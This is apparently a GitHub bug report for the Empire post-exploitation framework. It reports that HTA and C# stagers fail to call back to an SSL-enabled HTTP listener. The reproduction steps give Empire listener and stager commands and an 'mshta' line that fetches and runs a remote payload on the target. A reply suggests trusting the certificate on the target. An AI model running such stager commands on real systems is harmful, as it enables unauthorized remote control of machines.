Empire icon indicating copy to clipboard operation
Empire copied to clipboard

Published 20 hours ago verified publisher icon BC-SECURITY

[BUG] Stagers cannot connect back to http listeners over ssl

Open captain-woof opened this issue 3 years ago • 1 comments

Note: Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

Empire Version

  • Empire 4.0.0+gitsubmodule-0kali2

OS Information (Linux flavor, Python version)

  • OS: Kali
  • Python: 3.9

Describe the bug

Creating an http listener with ssl enabled, generating a stager to callback to that listener, and then executing that stager on the target does not create a connection at all. I tested this in a non-AV environment, Windows 10.

To Reproduce

Steps to reproduce the behavior:

  1. uselistener http
  2. set SSL True
  3. set CertPath path-to-dir
  4. set Host host
  5. set Port port
  6. execute
  7. usestager windows/hta (or csharp_exe, it doesn't matter which one)
  8. set Listener http (Didn't change the name for this test)
  9. execute

Then on target machine, mshta https://my-host:port/payload.hta

Expected behavior

A prompt asking user whether to trust the certificate, and creating a connection back when clicked on 'Yes'.

Screenshots

If needed, please ask.

Additional context

None.

captain-woof avatar Jul 18 '21 03:07 captain-woof

Have you tried adding the private cert to the targets windows cert storage? In a testing environment you can always do this. During an assesment you would of course use valid certs.

janit0rjoe avatar Jul 22 '21 18:07 janit0rjoe